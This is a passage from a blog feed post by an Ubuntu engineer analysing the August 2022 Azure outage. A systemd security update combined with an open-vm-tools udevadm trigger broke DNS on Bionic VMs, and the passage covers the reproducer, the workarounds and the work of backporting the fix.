Jekyll2022-12-11T23:49:00+00:00https://ruffell.nz/feed.xmlMatthew RuffellSustaining Engineer @ <a href="https://canonical.com">Canonical</a>.<br>Kernel Developer. Reverse Engineer.<br>Founder of <a href="https://dapperlinux.com">Dapper Linux</a>.Matthew RuffellReflecting on the Azure DNS Outage - A Post Incident Analysis2022-12-09T00:00:00+00:002022-12-09T00:00:00+00:00https://ruffell.nz/programming/writeups/2022/12/09/reflecting-on-the-azure-dns-outage-a-post-incident-analysis<p>During my work as a Sustaining Engineer at Canonical, occasionally I get tasked
with analysing and fixing high profile regressions that turn into world ending
emergencies. I think I have worked on four or five of these cases now, and
behind each and every one there is a story to tell, and lessons to be learned.</p>
<p>Today, we will dive into the intricate and complex series of events that caused
the worldwide Azure AKS Cloud outage, for systems running Ubuntu 18.04 LTS,
which I had the responsibility and leadership to resolve.</p>
<p><img src="/assets/images/2022_002.png" alt="hero" /></p>
<p>So, go brew a cup of coffee or whip up a hot chocolate, and let’s recount the
events that happened four months ago, and how we worked to resolve them without
causing another world ending event to occur.</p>
<!--more-->
<h1 id="the-impact">The Impact</h1>
<p>Late at night on the 30th of August, workloads hosted in Bionic VMs and
containers running on Azure Kubernetes Service (AKS), Azure Monitor,
Azure Sentinel, Azure Container Apps, and a few other services started failing,
after they had consumed a “bad” systemd package 237-3ubuntu10.54, which
unattended-upgrades had dutifully installed since it was freshly published to
the -security pocket to fix CVE-2022-2526.</p>
<p>This affected all users of the above services globally, and as you can imagine,
Azure is a popular platform to host infrastructure, it directly affected a
considerable amount of businesses, small and large, in their day-to-day
activities, which brought about media attention.</p>
<p>Its not often that bugs make the news, but this one was well written about:</p>
<ul>
<li><a href="https://news.ycombinator.com/item?id=32649273">Azure customers running Canonical Ubuntu 18.04 experiencing DNS errors</a></li>
<li><a href="https://news.ycombinator.com/item?id=32659631">Systemd takes Ubuntu down on Azure?</a></li>
<li><a href="https://www.theregister.com/2022/08/30/ubuntu_systemd_dns_update/">Ubuntu Linux 18.04 systemd security patch breaks DNS in Microsoft Azure</a></li>
<li><a href="https://www.zdnet.com/article/microsoft-azure-outage-continues-for-some-services-relying-on-ubuntu-bionic-release/">Microsoft Azure outage continues for some services relying on Ubuntu ‘Bionic’ release </a></li>
<li><a href="https://www.techradar.com/news/dodgy-microsoft-azure-update-knocks-ubuntu-vms-offline">Dodgy Microsoft Azure update knocks Ubuntu VMs offline</a></li>
<li><a href="https://mybroadband.co.za/news/software/458579-ubuntu-update-causes-server-downtime-on-microsoft-azure.html">Ubuntu update causes server downtime on Microsoft Azure</a></li>
<li><a href="https://linuxsecurity.com/news/security-vulnerabilities/ubuntu-linux-18-04-systemd-security-patch-breaks-dns-in-microsoft-azure">Ubuntu Linux 18.04 systemd Security Patch Breaks DNS in Microsoft Azure</a></li>
<li><a href="https://www.bleepingcomputer.com/news/microsoft/microsoft-azure-outage-knocks-ubuntu-vms-offline-after-buggy-update/">Microsoft Azure outage knocks Ubuntu VMs offline after buggy update</a></li>
<li><a href="https://redmondmag.com/articles/2022/08/30/microsoft-blames-ubuntu-update-dns-problems-for-azure-services-outage.aspx">Microsoft Blames Ubuntu Update DNS Problems for Azure Services Outage</a></li>
<li><a href="https://petri.com/microsoft-azure-outage-ubuntu-vms/">Microsoft is Investigating Azure Outage Affecting Ubuntu VMs</a></li>
<li><a href="https://thestack.technology/azure-kubernetes-outage-ubuntu-dns/">Bad Ubuntu update crashes global Azure Kubernetes services</a></li>
<li><a href="https://www.datacenterdynamics.com/en/news/microsoft-azures-canonical-ubuntu-service-experiencing-dns-errors/">Microsoft Azure’s Canonical Ubuntu service experiencing DNS errors</a></li>
<li><a href="https://www.itnews.com.au/news/outage-for-ubuntu-users-on-azure-584656">Outage for Ubuntu users on Azure</a></li>
<li><a href="https://thenewstack.io/ubuntu-linux-and-azure-dns-problem-gives-azure-fits/">Ubuntu Linux and Azure DNS Problem Gives Azure Fits</a></li>
<li><a href="https://cloud7.news/cloud/ubuntu-update-on-azure-vms-causing-dns-problems/">Ubuntu update on Azure VMs causing DNS problems</a></li>
</ul>
<p>At this point, Microsoft Support on Tweeted about it:</p>
<blockquote class="twitter-tweet" data-conversation="none" data-lang="en"><p lang="en" dir="ltr">We are aware of an ongoing incident with VMs that recently upgraded to system version 237-3ubuntu 10.54 experiencing DNS error. Please keep updated by following the Azure status page here: https://msft.it/6014jcVEG ^CR</p>— Azure Support (@azuresupport) <a href="https://twitter.com/AzureSupport/status/1564577499606286336">August 30, 2022</a></blockquote>
<p><img src="/assets/images/2022_002.png" alt="status" /></p>
<p>In terms of impact, this is about as big as you can get. Numerous businesses
were disrupted, and many experienced outages. People were woken up in the middle
of the night, paged by downtime watchdogs, and had to try figure out what on
earth went wrong.</p>
<p>I got into work in the morning, and it was like any normal day. Well, until I had
read the news, saw the event ongoing, and a new case was freshly escalated
to Sustaining Engineering.</p>
<h1 id="its-not-dns-theres-no-way-its-dns-it-was-dns">Its Not DNS; There’s no way its DNS; It was DNS</h1>
<p>At this point, there was much speculation that it was the changes made to
237-3ubuntu10.54 that caused the regression, and it simply did not get caught
by our internal regression test testsuites.</p>
<p>Nishit Majithia prepared the upload, which was actually pretty straightforward:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>systemd (237-3ubuntu10.54) bionic-security; urgency=medium
* SECURITY UPDATE: Use-after-free vulnerability in systemd.
- debian/patches/CVE-2022-2526.patch: pin stream while calling callbacks
for it in src/resolve/resolved-dns-stream.c
- CVE-2022-2526
-- Nishit Majithia <nishit.majithia@canonical.com> Mon, 29 Aug 2022 10:28:49 +0530
</code></pre></div></div>
<p>The diff is very basic, but it does directly change systemd-resolved and dns
processing:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>diff -Nru systemd-237/debian/patches/CVE-2022-2526.patch systemd-237/debian/patches/CVE-2022-2526.patch
--- systemd-237/debian/patches/CVE-2022-2526.patch 1970-01-01 00:00:00.000000000 +0000
+++ systemd-237/debian/patches/CVE-2022-2526.patch 2022-08-25 13:45:15.000000000 +0000
@@ -0,0 +1,33 @@
+From d973d94dec349fb676fdd844f6fe2ada3538f27c Mon Sep 17 00:00:00 2001
+From: Lennart Poettering <lennart@poettering.net>
+Date: Tue, 4 Dec 2018 22:13:39 +0100
+Subject: [PATCH] resolved: pin stream while calling callbacks for it
+
+These callbacks might unref the stream, but we still have to access it,
+let's hence ref it explicitly.
+
+Maybe fixes: #10725
+---
+ src/resolve/resolved-dns-stream.c | 4 +++-
+ 1 file changed, 3 insertions(+), 1 deletion(-)
+
+--- systemd-237.orig/src/resolve/resolved-dns-stream.c
++++ systemd-237/src/resolve/resolved-dns-stream.c
+@@ -64,6 +64,8 @@ static int dns_stream_update_io(DnsStrea
+ }
+
+ static int dns_stream_complete(DnsStream *s, int error) {
++ _cleanup_(dns_stream_unrefp) _unused_ DnsStream *ref = dns_stream_ref(s); /* Protect stream while we process it */
++
+ assert(s);
+ assert(error >= 0);
+
+@@ -214,7 +216,7 @@ static int on_stream_timeout(sd_event_so
+ }
+
+ static int on_stream_io(sd_event_source *es, int fd, uint32_t revents, void *userdata) {
+- DnsStream *s = userdata;
++ _cleanup_(dns_stream_unrefp) DnsStream *s = dns_stream_ref(userdata); /* Protect stream while we process it */
+ bool progressed = false;
+ int r;
+
</code></pre></div></div>
<p>However, the changes to the systemd package in 237-3ubuntu10.54 was completely
benign. We simply take a reference count to the dns stream to make sure it is
not freed when there are still references pointing to it.</p>
<p>Benign or not, if a package causes a regression, it gets pulled from the Ubuntu
archive until root cause is found, and a update issued to correct it. systemd
237-3ubuntu10.54 was removed from -security and -updates, and placed into
-proposed.</p>
<p>The interesting thing we all noted, is that it did not affect server installs on
bare metal, KVM, LXC or any other public cloud, like GCP or AWS.</p>
<p>A Launchpad bug was filed, and this is where most of our information about the
regression was kept. <a href="https://bugs.launchpad.net/ubuntu/+source/systemd/+bug/1988119">LP1988119 Update to systemd 237-3ubuntu10.54 broke dns</a></p>
<p>At this point, Kyler Horner from the Support Team was working with Azure
Engineers over a Google Meet, and had a breakthrough.</p>
<p>They noticed that the <code class="language-plaintext highlighter-rouge">hv_netvsc</code> kernel module is dropped from
<code class="language-plaintext highlighter-rouge">udevadm info /sys/class/net/eth0</code> after unattended-upgrades upgrades a fresh
Ubuntu Cloud Image for Azure. If you install the problematic systemd package
after unattended-upgrades had finished running, everything breaks.</p>
<p>The package in question was soon narrowed down to <code class="language-plaintext highlighter-rouge">open-vm-tools</code>. If you
installed open-vm-tools before systemd, DNS stops working, and the VM loses
networking.</p>
<p>Looking more closely at open-vm-tools 11.0.5-4ubuntu0.18.04.1 in bionic,
we find the following postinstall script:</p>
<p><code class="language-plaintext highlighter-rouge">debian/open-vm-tools.postinst</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#!/bin/sh
set -e
case "${1}" in
configure)
if which udevadm 1>/dev/null; then
udevadm trigger || true
fi
;;
abort-upgrade|abort-remove|abort-deconfigure)
;;
*)
echo "postinst called with unknown argument \`${1}'" >&2
exit 1
;;
esac
#DEBHELPER#
exit 0
</code></pre></div></div>
<p>Okay, so when open-vm-tools is run, it calls a wholesale <code class="language-plaintext highlighter-rouge">udevadm trigger || true</code>.
Then, when systemd is installed, it restarts the systemd-networkd service, and
then the issue is reproduced.</p>
<p>So, we have a minimal reproducer.</p>
<p>Start a VM on Azure:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>1. $ ping google.com
PING google.com (172.253.62.102) 56(84) bytes of data.
64 bytes from bc-in-f102.1e100.net (172.253.62.102): icmp_seq=1 ttl=56
2. sudo udevadm trigger
3. sudo systemctl restart systemd-networkd
4. ping google.com
ping: google.com: Temporary failure in name resolution
</code></pre></div></div>
<p>Now, the udev (userspace /dev) subsystem is responsible managing device nodes
in /dev, and does so by constantly scanning for devices and hotplug events,
and when one happens, it applies a series of udev rules, and makes sure the
correct kernel module is loaded for whatever piece of hardware is attached, or
a script run, etc.</p>
<p>In this case, let’s consider the output of <code class="language-plaintext highlighter-rouge">udevadm info /sys/class/net/eth0</code>,
the ethernet device powered by <code class="language-plaintext highlighter-rouge">hv_netvsc</code>.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo apt-cache policy systemd | grep Installed
Installed: 237-3ubuntu10.53
$ udevadm info /sys/class/net/eth0
P: /devices/LNXSYSTM:00/LNXSYBUS:00/ACPI0004:00/VMBUS:00/000d3a1b-6d42-000d-3a1b-6d42000d3a1b/net/eth0
E: DEVPATH=/devices/LNXSYSTM:00/LNXSYBUS:00/ACPI0004:00/VMBUS:00/000d3a1b-6d42-000d-3a1b-6d42000d3a1b/net/eth0
E: ID_NET_DRIVER=hv_netvsc
E: ID_NET_LINK_FILE=/run/systemd/network/10-netplan-eth0.link
E: ID_NET_NAME=eth0
E: ID_NET_NAME_MAC=enx000d3a1b6d42
E: ID_OUI_FROM_DATABASE=Microsoft Corp.
E: ID_PATH=acpi-VMBUS:00
E: ID_PATH_TAG=acpi-VMBUS_00
E: IFINDEX=2
E: INTERFACE=eth0
E: NM_UNMANAGED=1
E: SUBSYSTEM=net
E: SYSTEMD_ALIAS=/sys/subsystem/net/devices/eth0
E: TAGS=:systemd:
E: USEC_INITIALIZED=1977684
</code></pre></div></div>
<p>If we then issue udevadm trigger:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo udevadm trigger
$ udevadm info /sys/class/net/eth0
P: /devices/LNXSYSTM:00/LNXSYBUS:00/ACPI0004:00/VMBUS:00/000d3a1b-6d42-000d-3a1b-6d42000d3a1b/net/eth0
E: DEVPATH=/devices/LNXSYSTM:00/LNXSYBUS:00/ACPI0004:00/VMBUS:00/000d3a1b-6d42-000d-3a1b-6d42000d3a1b/net/eth0
E: ID_NET_NAME_MAC=enx000d3a1b6d42
E: ID_OUI_FROM_DATABASE=Microsoft Corp.
E: ID_PATH=acpi-VMBUS:00
E: ID_PATH_TAG=acpi-VMBUS_00
E: IFINDEX=2
E: INTERFACE=eth0
E: SUBSYSTEM=net
E: SYSTEMD_ALIAS=/sys/subsystem/net/devices/eth0
E: TAGS=:systemd:
E: USEC_INITIALIZED=1977684
</code></pre></div></div>
<p>We lost a few attributes, namely <code class="language-plaintext highlighter-rouge">ID_NET_DRIVER</code>, <code class="language-plaintext highlighter-rouge">ID_NET_LINK_FILE</code>, <code class="language-plaintext highlighter-rouge">ID_NET_NAME</code>.</p>
<p>These attributes turn out to be really, really important.</p>
<p>The <code class="language-plaintext highlighter-rouge">eth0</code> device is managed by Netplan on Azure. Looking at the YAML extracted
from an Azure instance:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>network:
ethernets:
eth0:
dhcp4: true
match:
driver: hv_netvsc
macaddress: 00:0d:3a:1a:b4:7d
set-name: eth0
version: 2
</code></pre></div></div>
<p>We see that we are directly matching on <code class="language-plaintext highlighter-rouge">driver: hv_netvsc</code>. But how does
Netplan match for <code class="language-plaintext highlighter-rouge">hv_netvsc</code>? It checks <code class="language-plaintext highlighter-rouge">ID_NET_DRIVER</code>!</p>
<p>When Netplan cannot match <code class="language-plaintext highlighter-rouge">ID_NET_DRIVER</code>, systemd-networkd cannot manage the
interface. So when systemd-networkd is restarted, eth0 becomes unmanaged, and
DNS goes down.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ ping google.com
ping: google.com: Temporary failure in name resolution
</code></pre></div></div>
<h2 id="workarounds">Workarounds</h2>
<p>At this point, the community were coming up with all sorts of workarounds to get
DNS restored. I’ll document a few, since they are interesting.</p>
<p>You can manually run dhclient:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ dhclient -x
$ dhclient -i eth0
</code></pre></div></div>
<p>You can reboot the node, (what I recommended early on).</p>
<p>Another solution was to send an <code class="language-plaintext highlighter-rouge">ADD</code> uevent to the device missing <code class="language-plaintext highlighter-rouge">ID_NET_DRIVER</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo udevadm trigger -c add -y eth0
</code></pre></div></div>
<p>and the various ways of populating <code class="language-plaintext highlighter-rouge">/etc/resolve.conf</code> from within Kubernetes:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ VMSS=XXX-vmss
$ nodeResourceGroup=XXX-worker
$ az vmss list-instances -g $nodeResourceGroup -n $VMSS --query "[].id" --output tsv | az vmss run-command invoke --scripts "systemd-resolve --set-dns=your_dns --set-dns=your_dns --set-domain=reddog.microsoft.com --interface=eth0" --command-id RunShellScript --ids @-
</code></pre></div></div>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kubectl get no -o json | jq -r '.items[].spec.providerID' | cut -c 9- | az vmss run-command invoke --ids @- \
--command-id RunShellScript \
--scripts 'grep nameserver /etc/resolv.conf || { dhclient -x; dhclient -i eth0; sleep 10; pkill dhclient; grep nameserver /etc/resolv.conf; }'
</code></pre></div></div>
<p>and so on.</p>
<p>Okay, so now we understand the events that lead to the widespread outage.
An <code class="language-plaintext highlighter-rouge">open-vm-tools</code> package update was released a few weeks prior, and
unattended-upgrades had installed it like any other package update.
This ran a postinstall script that executed <code class="language-plaintext highlighter-rouge">udevadm trigger</code> wholesale,
which caused the <code class="language-plaintext highlighter-rouge">ID_NET_DRIVER</code> attribute to be lost from <code class="language-plaintext highlighter-rouge">eth0</code>, priming the
systems for failure. When the systemd security update came through, it restarted
systemd-networkd, and since Netplan could not match <code class="language-plaintext highlighter-rouge">hv_netvsc</code> against
<code class="language-plaintext highlighter-rouge">ID_NET_DRIVER</code>, <code class="language-plaintext highlighter-rouge">eth0</code> went unmanaged, and the VM lost DNS, causing failure.</p>
<p>What makes this case interesting, is that this is a complex interaction between
two packages, the type of bug that is extremely hard to find during normal
regression testing.</p>
<h1 id="the-fix">The Fix</h1>
<p>We have a pretty good understanding of the problem, and even have a minimal
reproducer which makes testing easy. Time to dive in and find the actual root
cause, and determine what needs to be fixed.</p>
<h2 id="systemd">systemd</h2>
<p>Chris Coulson, from the Security Team had found the commit that would likely fix
the issue before I had even read the case, and that is:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>commit e0e789c1e97e2cdf1cafe0c6b7d7e43fa054f151
Author: Yu Watanabe <watanabe.yu+github@gmail.com>
Date: Mon, 14 Sep 2020 15:21:04 +0900
Subject: udev: re-assign ID_NET_DRIVER=, ID_NET_LINK_FILE=, ID_NET_NAME= properties on non-'add' uevent
Link: https://github.com/systemd/systemd/commit/e0e789c1e97e2cdf1cafe0c6b7d7e43fa054f151
</code></pre></div></div>
<p>When I got in in the morning, I read the case, created a few Azure VMs, made
sure I could reproduce the issue, and set about backporting the commit to test
if it does indeed fix the issue.</p>
<p>This means the bug exists in systemd itself, in the udev subsystem. Looking
closer at the patch:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>From e0e789c1e97e2cdf1cafe0c6b7d7e43fa054f151 Mon Sep 17 00:00:00 2001
From: Yu Watanabe <watanabe.yu+github@gmail.com>
Date: Mon, 14 Sep 2020 15:21:04 +0900
Subject: [PATCH] udev: re-assign ID_NET_DRIVER=, ID_NET_LINK_FILE=,
ID_NET_NAME= properties on non-'add' uevent
Previous commit makes drop ID_NET_DRIVER=, ID_NET_LINK_FILE=, and
ID_NET_NAME= properties for network interfaces on 'move' uevent.
ID_NET_DRIVER= and ID_NET_LINK_FILE= properties are used by networkctl.
ID_NET_NAME= may be used by end-user rules or programs. So, let's
re-assign them on 'move' uevent. (Note that strictly speaking, this
makes them re-assigned on all but 'remove' uevent.)
---
rules.d/80-net-setup-link.rules | 2 +-
src/udev/net/link-config.c | 30 +++++++++++++++++++++++++++---
2 files changed, 28 insertions(+), 4 deletions(-)
diff --git a/rules.d/80-net-setup-link.rules b/rules.d/80-net-setup-link.rules
index 6e411a91f0ec..bafc3fbc846b 100644
--- a/rules.d/80-net-setup-link.rules
+++ b/rules.d/80-net-setup-link.rules
@@ -4,7 +4,7 @@ SUBSYSTEM!="net", GOTO="net_setup_link_end"
IMPORT{builtin}="path_id"
-ACTION!="add", GOTO="net_setup_link_end"
+ACTION=="remove", GOTO="net_setup_link_end"
IMPORT{builtin}="net_setup_link"
diff --git a/src/udev/net/link-config.c b/src/udev/net/link-config.c
index 77edbb674dc7..5c871b671796 100644
--- a/src/udev/net/link-config.c
+++ b/src/udev/net/link-config.c
@@ -11,6 +11,7 @@
#include "conf-files.h"
#include "conf-parser.h"
#include "def.h"
+#include "device-private.h"
#include "device-util.h"
#include "ethtool-util.h"
#include "fd-util.h"
@@ -605,6 +606,7 @@ static int link_config_apply_alternative_names(sd_netlink **rtnl, const link_con
int link_config_apply(link_config_ctx *ctx, const link_config *config, sd_device *device, const char **ret_name) {
const char *new_name;
+ DeviceAction a;
int r;
assert(ctx);
@@ -612,6 +614,20 @@ int link_config_apply(link_config_ctx *ctx, const link_config *config, sd_device
assert(device);
assert(ret_name);
+ r = device_get_action(device, &a);
+ if (r < 0)
+ return log_device_error_errno(device, r, "Failed to get ACTION= property: %m");
+
+ if (!IN_SET(a, DEVICE_ACTION_ADD, DEVICE_ACTION_BIND, DEVICE_ACTION_MOVE)) {
+ log_device_debug(device, "Skipping to apply .link settings on '%s' uevent.", device_action_to_string(a));
+
+ r = sd_device_get_sysname(device, ret_name);
+ if (r < 0)
+ return log_device_error_errno(device, r, "Failed to get sysname: %m");
+
+ return 0;
+ }
+
r = link_config_apply_ethtool_settings(&ctx->ethtool_fd, config, device);
if (r < 0)
return r;
@@ -620,9 +636,17 @@ int link_config_apply(link_config_ctx *ctx, const link_config *config, sd_device
if (r < 0)
return r;
- r = link_config_generate_new_name(ctx, config, device, &new_name);
- if (r < 0)
- return r;
+ if (a == DEVICE_ACTION_MOVE) {
+ log_device_debug(device, "Skipping to apply Name= and NamePolicy= on '%s' uevent.", device_action_to_string(a));
+
+ r = sd_device_get_sysname(device, &new_name);
+ if (r < 0)
+ return log_device_error_errno(device, r, "Failed to get sysname: %m");
+ } else {
+ r = link_config_generate_new_name(ctx, config, device, &new_name);
+ if (r < 0)
+ return r;
+ }
r = link_config_apply_alternative_names(&ctx->rtnl, config, device, new_name);
if (r < 0)
</code></pre></div></div>
<p>At face value, the patch simply checks to see what kind of uevent had been issued.
If its anything different than <code class="language-plaintext highlighter-rouge">DEVICE_ACTION_ADD</code>, <code class="language-plaintext highlighter-rouge">DEVICE_ACTION_BIND</code>, <code class="language-plaintext highlighter-rouge">DEVICE_ACTION_MOVE</code>,
such as <code class="language-plaintext highlighter-rouge">DEVICE_ACTION_CHANGE</code> or <code class="language-plaintext highlighter-rouge">DEVICE_ACTION_REMOVE</code> then return from
<code class="language-plaintext highlighter-rouge">link_config_apply()</code> early.</p>
<p>If we have a <code class="language-plaintext highlighter-rouge">DEVICE_ACTION_MOVE</code> uevent, then we keep the existing <code class="language-plaintext highlighter-rouge">Name=</code>
and <code class="language-plaintext highlighter-rouge">NamePolicy=</code> attributes, and otherwise, generate new ones.</p>
<p>The important part is the <code class="language-plaintext highlighter-rouge">DEVICE_ACTION_MOVE</code> hunk, which is what really solves
the issue.</p>
<p>It was at this point that I made a discovery, that we had experienced this exact
same issue two years previous in Focal and Groovy, in <a href="https://bugs.launchpad.net/ubuntu/+source/systemd/+bug/1902960">LP1902960 Upgrade from 245.4-4ubuntu3.3 to 245.4-4ubuntu3.2 appears to break DNS resolution in some cases</a>.</p>
<p>The backport for Focal and Groovy was performed by my colleague at the time,
Dan Streetman. Back then, there was no evidence that Bionic was affected by
this issue, and the problem had not been reproduced there, so for risk of
regression, it was omitted.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>> while this commit is not included in bionic, due to the difficult nature of
> reproducing (and verifying) this, and the fact it has only been seen once on
> a focal image, I don't think it's appropriate to SRU to bionic at this point;
> possibly it may be appropriate if this is ever reproduced with a bionic image.
</code></pre></div></div>
<p>It is easy to get caught up in the moment and think that all of this trouble
could have been avoided if we had just backported the fix to Bionic when the
issue was first discovered, but the world, life, and software engineering
sometimes isn’t as simple as that. Any change at all could possibly introduce
a regression to any package in Ubuntu, even a simple no-change rebuild of a
package could introduce a dire regression (it might be linked against a newer
version of a library that you would never think of, which might contain a bug).
Any and all changes to packages in the Ubuntu archive require a great deal of
thought, and sometimes you err on the side of caution and not introduce a change.</p>
<p>At the time, the issue did not reproduce, it wasn’t seen anywhere else, while it
directly affected Focal, and while SRU policy stipulates that you need to fix
all stable releases that are affected, you could have easily made the argument
that since the problem was not observed on Bionic, and systemd is a critical
core package, the risk of regression would be very high for something not
testable (at that time).</p>
<p>So, in these situations, it’s best to accept the facts of what happened, and
instead of getting frustrated, be happy there is additional information
available on the Launchpad bug, and even more in the debdiff.</p>
<p>Now, looking at Bionic’s systemd implementation, we actually have a bit of
an issue:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int link_config_apply(link_config_ctx *ctx, link_config *config,
struct udev_device *device, const char **name) {
bool respect_predictable = false;
struct ether_addr generated_mac;
struct ether_addr *mac = NULL;
const char *new_name = NULL;
const char *old_name;
unsigned speed;
int r, ifindex;
assert(ctx);
assert(config);
assert(device);
assert(name);
old_name = udev_device_get_sysname(device);
if (!old_name)
return -EINVAL;
r = ethtool_set_glinksettings(&ctx->ethtool_fd, old_name, config);
if (r < 0) {
if (config->port != _NET_DEV_PORT_INVALID)
log_warning_errno(r, "Could not set port (%s) of %s: %m", port_to_string(config->port), old_name);
speed = DIV_ROUND_UP(config->speed, 1000000);
if (r == -EOPNOTSUPP)
r = ethtool_set_speed(&ctx->ethtool_fd, old_name, speed, config->duplex);
if (r < 0)
log_warning_errno(r, "Could not set speed or duplex of %s to %u Mbps (%s): %m",
old_name, speed, duplex_to_string(config->duplex));
}
r = ethtool_set_wol(&ctx->ethtool_fd, old_name, config->wol);
if (r < 0)
log_warning_errno(r, "Could not set WakeOnLan of %s to %s: %m",
old_name, wol_to_string(config->wol));
r = ethtool_set_features(&ctx->ethtool_fd, old_name, config->features);
if (r < 0)
log_warning_errno(r, "Could not set offload features of %s: %m", old_name);
ifindex = udev_device_get_ifindex(device);
if (ifindex <= 0) {
log_warning("Could not find ifindex");
return -ENODEV;
}
if (ctx->enable_name_policy && config->name_policy) {
NamePolicy *policy;
for (policy = config->name_policy;
!new_name && *policy != _NAMEPOLICY_INVALID; policy++) {
switch (*policy) {
case NAMEPOLICY_KERNEL:
respect_predictable = true;
break;
case NAMEPOLICY_DATABASE:
new_name = udev_device_get_property_value(device, "ID_NET_NAME_FROM_DATABASE");
break;
case NAMEPOLICY_ONBOARD:
new_name = udev_device_get_property_value(device, "ID_NET_NAME_ONBOARD");
break;
case NAMEPOLICY_SLOT:
new_name = udev_device_get_property_value(device, "ID_NET_NAME_SLOT");
break;
case NAMEPOLICY_PATH:
new_name = udev_device_get_property_value(device, "ID_NET_NAME_PATH");
break;
case NAMEPOLICY_MAC:
new_name = udev_device_get_property_value(device, "ID_NET_NAME_MAC");
break;
default:
break;
}
}
}
if (should_rename(device, respect_predictable)) {
/* if not set by policy, fall back manually set name */
if (!new_name)
new_name = config->name;
} else
new_name = NULL;
switch (config->mac_policy) {
case MACPOLICY_PERSISTENT:
if (mac_is_random(device)) {
r = get_mac(device, false, &generated_mac);
if (r == -ENOENT) {
log_warning_errno(r, "Could not generate persistent MAC address for %s: %m", old_name);
break;
} else if (r < 0)
return r;
mac = &generated_mac;
}
break;
case MACPOLICY_RANDOM:
if (!mac_is_random(device)) {
r = get_mac(device, true, &generated_mac);
if (r == -ENOENT) {
log_warning_errno(r, "Could not generate random MAC address for %s: %m", old_name);
break;
} else if (r < 0)
return r;
mac = &generated_mac;
}
break;
case MACPOLICY_NONE:
default:
mac = config->mac;
}
r = rtnl_set_link_properties(&ctx->rtnl, ifindex, config->alias, mac, config->mtu);
if (r < 0)
return log_warning_errno(r, "Could not set Alias, MACAddress or MTU on %s: %m", old_name);
*name = new_name;
return 0;
}
</code></pre></div></div>
<p>Looking at the first hunk:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>@@ -612,6 +614,20 @@ int link_config_apply(link_config_ctx *ctx, const link_config *config, sd_device
assert(device);
assert(ret_name);
+ r = device_get_action(device, &a);
+ if (r < 0)
+ return log_device_error_errno(device, r, "Failed to get ACTION= property: %m");
+
+ if (!IN_SET(a, DEVICE_ACTION_ADD, DEVICE_ACTION_BIND, DEVICE_ACTION_MOVE)) {
+ log_device_debug(device, "Skipping to apply .link settings on '%s' uevent.", device_action_to_string(a));
+
+ r = sd_device_get_sysname(device, ret_name);
+ if (r < 0)
+ return log_device_error_errno(device, r, "Failed to get sysname: %m");
+
+ return 0;
+ }
+
r = link_config_apply_ethtool_settings(&ctx->ethtool_fd, config, device);
if (r < 0)
return r;
</code></pre></div></div>
<p>If we backport this as-is, we run into numerous problems, namely
<code class="language-plaintext highlighter-rouge">device_get_action()</code> does not exist, <code class="language-plaintext highlighter-rouge">log_device_error_errno()</code> and
<code class="language-plaintext highlighter-rouge">log_device_debug()</code> do not exist, and neither does <code class="language-plaintext highlighter-rouge">sd_device_get_sysname()</code>.</p>
<p>This is because these functions were added sometime after the version of systemd
in Bionic was released.</p>
<p>So, we are up a creek, and we have no paddle. The second hunk is much the same,
systemd has changed substantially since the release of Bionic to when this fix
was authored, and there is no direct way to backport the fix in a cherry-pick
like manner.</p>
<p>I tracked down the commits where these got added:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>commit a11300221482da7ffe7be2d75d508ddd411814f6
From: Lennart Poettering <lennart@poettering.net>
Date: Wed, 10 Feb 2021 22:15:01 +0100
Subject: sd-device: add sd_device_get_action() +
sd_device_get_seqnum() + sd_device_new_from_stat_rdev()
Link: https://github.com/systemd/systemd/commit/a11300221482da7ffe7be2d75d508ddd411814f6
</code></pre></div></div>
<p>This commit alone is 145 lines added and 139 lines deleted. The commit does
not backport cleanly at all, and worse, is too significant a change to even
be considered for SRU.</p>
<p>The logging ones are worse:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>commit ab54f12b783eea891d6414fbc14cd6fe7cbe4c80
From: Yu Watanabe <watanabe.yu+github@gmail.com>
Date: Wed, 9 Sep 2020 02:10:27 +0900
Subject: sd-device: make log_device_error() or friends return void
Link: https://github.com/systemd/systemd/commit/ab54f12b783eea891d6414fbc14cd6fe7cbe4c80
commit edee65a6a4f646b6812aa29fb9bf4f71c313981e
From: =?UTF-8?q?Zbigniew=20J=C4=99drzejewski-Szmek?= <zbyszek@in.waw.pl>
Date: Fri, 17 Dec 2021 11:43:26 +0100
Subject: udev/net_id: add debug logging for construction of device
names
Link: https://github.com/systemd/systemd/commit/edee65a6a4f646b6812aa29fb9bf4f71c313981e
</code></pre></div></div>
<p>So, we cannot backport these commits just to get some functions required for a
fix, no matter how critical the fix is. We are going to have to come up with
another backport, which is functionally the same, that uses the functions
present in the Bionic implementation of systemd.</p>
<p>This is when I was very pleased to have the fixes from Focal and Groovy to study.</p>
<p>Let’s have a look at Dan Streetman’s backport to Focal:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>From e0e789c1e97e2cdf1cafe0c6b7d7e43fa054f151 Mon Sep 17 00:00:00 2001
From: Yu Watanabe <watanabe.yu+github@gmail.com>
Date: Mon, 14 Sep 2020 15:21:04 +0900
Subject: [PATCH] udev: re-assign ID_NET_DRIVER=, ID_NET_LINK_FILE=,
